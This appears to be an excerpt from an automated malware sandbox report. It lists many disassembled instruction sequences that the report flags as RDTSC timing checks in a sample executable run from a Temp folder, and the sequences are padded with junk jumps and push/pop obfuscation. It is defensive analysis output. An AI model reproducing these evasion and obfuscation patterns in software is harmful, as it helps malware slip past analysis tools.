Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CA0D37 second address: 4CA0D46 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b mov dx, BCDCh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CA0D46 second address: 4CA0DA1 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF698E1E1B5h 0x00000008 or ax, A936h 0x0000000d jmp 00007FF698E1E1B1h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FF698E1E1B0h 0x0000001b and si, 5058h 0x00000020 jmp 00007FF698E1E1ABh 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CA0DA1 second address: 4CA0DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CA0DA5 second address: 4CA0DAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CA0DAB second address: 4CA0DF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, esi 0x00000005 pushfd 0x00000006 jmp 00007FF698BF10D4h 0x0000000b or cl, FFFFFFE8h 0x0000000e jmp 00007FF698BF10CBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 jmp 00007FF698BF10D6h 0x0000001e xchg eax, ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CA0DF6 second address: 4CA0DFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CA0DFA second address: 4CA0DFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CA0DFE second address: 4CA0E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CA0E04 second address: 4CA0E0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CA0E0A second address: 4CA0E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CA0E0E second address: 4CA0E12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CA0E12 second address: 4CA0EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007FF698E1E1B3h 0x0000000f mov ch, 09h 0x00000011 pop edx 0x00000012 call 00007FF698E1E1B2h 0x00000017 pushfd 0x00000018 jmp 00007FF698E1E1B2h 0x0000001d jmp 00007FF698E1E1B5h 0x00000022 popfd 0x00000023 pop eax 0x00000024 popad 0x00000025 xchg eax, ecx 0x00000026 pushad 0x00000027 mov dl, 9Fh 0x00000029 call 00007FF698E1E1B6h 0x0000002e mov si, CE61h 0x00000032 pop esi 0x00000033 popad 0x00000034 mov eax, dword ptr [774365FCh] 0x00000039 pushad 0x0000003a call 00007FF698E1E1B3h 0x0000003f movzx eax, di 0x00000042 pop ebx 0x00000043 push esi 0x00000044 mov dh, 16h 0x00000046 pop eax 0x00000047 popad 0x00000048 test eax, eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FF698E1E1B4h 0x00000051 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CA0EC9 second address: 4CA0F22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 mov ecx, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FF70B303B59h 0x00000010 pushad 0x00000011 movsx ebx, si 0x00000014 mov cl, FBh 0x00000016 popad 0x00000017 mov ecx, eax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FF698BF10CFh 0x00000020 sbb eax, 1F24F77Eh 0x00000026 jmp 00007FF698BF10D9h 0x0000002b popfd 0x0000002c mov esi, 62DC6DC7h 0x00000031 popad 0x00000032 xor eax, dword ptr [ebp+08h] 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CA0F22 second address: 4CA0F26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CA0F26 second address: 4CA0F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CA0F2C second address: 4CA0F32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4CA0F32 second address: 4CA0FB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and ecx, 1Fh 0x0000000e pushad 0x0000000f mov al, 4Bh 0x00000011 mov si, di 0x00000014 popad 0x00000015 ror eax, cl 0x00000017 jmp 00007FF698BF10CBh 0x0000001c leave 0x0000001d jmp 00007FF698BF10D6h 0x00000022 retn 0004h 0x00000025 nop 0x00000026 mov esi, eax 0x00000028 lea eax, dword ptr [ebp-08h] 0x0000002b xor esi, dword ptr [00452014h] 0x00000031 push eax 0x00000032 push eax 0x00000033 push eax 0x00000034 lea eax, dword ptr [ebp-10h] 0x00000037 push eax 0x00000038 call 00007FF69D482078h 0x0000003d push FFFFFFFEh 0x0000003f jmp 00007FF698BF10D0h 0x00000044 pop eax 0x00000045 pushad 0x00000046 pushad 0x00000047 pushad 0x00000048 popad 0x00000049 pushfd 0x0000004a jmp 00007FF698BF10CAh 0x0000004f adc cl, FFFFFFC8h 0x00000052 jmp 00007FF698BF10CBh 0x00000057 popfd 0x00000058 popad 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C60008 second address: 4C6000C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C6000C second address: 4C60012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C60012 second address: 4C60068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 5F3Ch 0x00000007 push edi 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e mov ecx, 2CE79E79h 0x00000013 pushfd 0x00000014 jmp 00007FF698E1E1B6h 0x00000019 and cx, 6588h 0x0000001e jmp 00007FF698E1E1ABh 0x00000023 popfd 0x00000024 popad 0x00000025 mov dword ptr [esp], ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FF698E1E1B5h 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C60068 second address: 4C600A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF698BF10D7h 0x00000009 xor ecx, 1718272Eh 0x0000000f jmp 00007FF698BF10D9h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C600A5 second address: 4C600C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a mov edx, ecx 0x0000000c mov bh, al 0x0000000e popad 0x0000000f and esp, FFFFFFF8h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF698E1E1ACh 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C600C5 second address: 4C60125 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007FF698BF10D6h 0x0000000f push eax 0x00000010 jmp 00007FF698BF10CBh 0x00000015 xchg eax, ecx 0x00000016 jmp 00007FF698BF10D6h 0x0000001b xchg eax, ebx 0x0000001c jmp 00007FF698BF10D0h 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C60125 second address: 4C6012E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, 9699h 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C6012E second address: 4C60145 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C60145 second address: 4C60194 instructions: 0x00000000 rdtsc 0x00000002 call 00007FF698E1E1B1h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushfd 0x0000000b jmp 00007FF698E1E1B1h 0x00000010 jmp 00007FF698E1E1ABh 0x00000015 popfd 0x00000016 popad 0x00000017 mov ebx, dword ptr [ebp+10h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF698E1E1B5h 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C60194 second address: 4C60233 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 mov cl, dl 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FF698BF10D2h 0x00000011 push eax 0x00000012 pushad 0x00000013 push edi 0x00000014 push esi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushfd 0x00000018 jmp 00007FF698BF10D9h 0x0000001d or cl, 00000066h 0x00000020 jmp 00007FF698BF10D1h 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, esi 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b call 00007FF698BF10D3h 0x00000030 pop eax 0x00000031 pushfd 0x00000032 jmp 00007FF698BF10D9h 0x00000037 or esi, 3540F526h 0x0000003d jmp 00007FF698BF10D1h 0x00000042 popfd 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C60233 second address: 4C6026A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d jmp 00007FF698E1E1ACh 0x00000012 mov eax, 48FF96D1h 0x00000017 popad 0x00000018 xchg eax, edi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov ebx, 27ECA53Ch 0x00000021 mov esi, edx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C6026A second address: 4C602EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov cx, 38B3h 0x0000000f popad 0x00000010 xchg eax, edi 0x00000011 jmp 00007FF698BF10D6h 0x00000016 test esi, esi 0x00000018 jmp 00007FF698BF10D0h 0x0000001d je 00007FF70B33F42Fh 0x00000023 pushad 0x00000024 push esi 0x00000025 pushfd 0x00000026 jmp 00007FF698BF10CDh 0x0000002b jmp 00007FF698BF10CBh 0x00000030 popfd 0x00000031 pop esi 0x00000032 call 00007FF698BF10D9h 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C602EA second address: 4C60334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000d jmp 00007FF698E1E1ADh 0x00000012 je 00007FF70B56C4CDh 0x00000018 jmp 00007FF698E1E1AEh 0x0000001d mov edx, dword ptr [esi+44h] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FF698E1E1B7h 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C60334 second address: 4C6033A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C6033A second address: 4C6036D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or edx, dword ptr [ebp+0Ch] 0x0000000e jmp 00007FF698E1E1B6h 0x00000013 test edx, 61000000h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C6036D second address: 4C6041B instructions: 0x00000000 rdtsc 0x00000002 mov ax, 684Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007FF698BF10D4h 0x0000000e jmp 00007FF698BF10D5h 0x00000013 popfd 0x00000014 popad 0x00000015 jne 00007FF70B33F3ADh 0x0000001b pushad 0x0000001c push esi 0x0000001d call 00007FF698BF10D3h 0x00000022 pop esi 0x00000023 pop edi 0x00000024 jmp 00007FF698BF10D6h 0x00000029 popad 0x0000002a test byte ptr [esi+48h], 00000001h 0x0000002e jmp 00007FF698BF10D0h 0x00000033 jne 00007FF70B33F37Eh 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007FF698BF10CDh 0x00000042 or esi, 1294E456h 0x00000048 jmp 00007FF698BF10D1h 0x0000004d popfd 0x0000004e push ecx 0x0000004f pop ebx 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C508C7 second address: 4C508D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C508D6 second address: 4C5091B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FF698BF10D3h 0x00000014 sbb cx, 00FEh 0x00000019 jmp 00007FF698BF10D9h 0x0000001e popfd 0x0000001f mov di, si 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C5091B second address: 4C50921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50921 second address: 4C50925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50925 second address: 4C50962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FF698E1E1ACh 0x00000013 pushfd 0x00000014 jmp 00007FF698E1E1B2h 0x00000019 sbb cl, 00000058h 0x0000001c jmp 00007FF698E1E1ABh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50962 second address: 4C5097A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF698BF10D4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C5097A second address: 4C50998 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov ecx, 1B11010Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 movzx esi, bx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50998 second address: 4C50A00 instructions: 0x00000000 rdtsc 0x00000002 mov ax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 and esp, FFFFFFF8h 0x0000000b pushad 0x0000000c mov si, dx 0x0000000f jmp 00007FF698BF10D7h 0x00000014 popad 0x00000015 xchg eax, ebx 0x00000016 jmp 00007FF698BF10D6h 0x0000001b push eax 0x0000001c jmp 00007FF698BF10CBh 0x00000021 xchg eax, ebx 0x00000022 jmp 00007FF698BF10D6h 0x00000027 xchg eax, esi 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50A00 second address: 4C50A06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50A06 second address: 4C50A0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50A0C second address: 4C50A5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FF698E1E1ABh 0x00000011 xchg eax, esi 0x00000012 jmp 00007FF698E1E1B6h 0x00000017 mov esi, dword ptr [ebp+08h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF698E1E1B7h 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50A5F second address: 4C50AB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 pushfd 0x00000007 jmp 00007FF698BF10D0h 0x0000000c add ch, 00000058h 0x0000000f jmp 00007FF698BF10CBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 sub ebx, ebx 0x0000001a jmp 00007FF698BF10CFh 0x0000001f test esi, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FF698BF10D5h 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50AB2 second address: 4C50AF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FF70B573A6Dh 0x0000000f jmp 00007FF698E1E1AEh 0x00000014 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF698E1E1AAh 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50AF0 second address: 4C50AFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50AFF second address: 4C50B38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b jmp 00007FF698E1E1AEh 0x00000010 je 00007FF70B573A1Dh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50B38 second address: 4C50B3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50B3C second address: 4C50B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50B42 second address: 4C50B6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [77436968h], 00000002h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF698BF10D5h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50B6D second address: 4C50B73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50B73 second address: 4C50BAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FF70B3468F9h 0x0000000f pushad 0x00000010 mov di, cx 0x00000013 push eax 0x00000014 mov eax, edx 0x00000016 pop ebx 0x00000017 popad 0x00000018 mov edx, dword ptr [ebp+0Ch] 0x0000001b jmp 00007FF698BF10D0h 0x00000020 xchg eax, ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50BAC second address: 4C50C51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FF698E1E1AFh 0x00000010 jmp 00007FF698E1E1B8h 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FF698E1E1AEh 0x0000001e adc cx, 5518h 0x00000023 jmp 00007FF698E1E1ABh 0x00000028 popfd 0x00000029 push esi 0x0000002a pushfd 0x0000002b jmp 00007FF698E1E1AFh 0x00000030 or al, FFFFFFDEh 0x00000033 jmp 00007FF698E1E1B9h 0x00000038 popfd 0x00000039 pop ecx 0x0000003a popad 0x0000003b push ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FF698E1E1B3h 0x00000043 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50C51 second address: 4C50C75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF698BF10CFh 0x00000008 pop esi 0x00000009 movsx ebx, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov esi, edx 0x00000017 mov esi, ebx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50CFE second address: 4C50D04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50D04 second address: 4C50D09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50D09 second address: 4C50D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF698E1E1AFh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50D24 second address: 4C50D41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698BF10D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\BAFIEGIECG.exe	RDTSC instruction interceptor: First address: 4C50D41 second address: 4C50D66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF698E1E1B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF698E1E1ADh 0x00000011 rdtsc
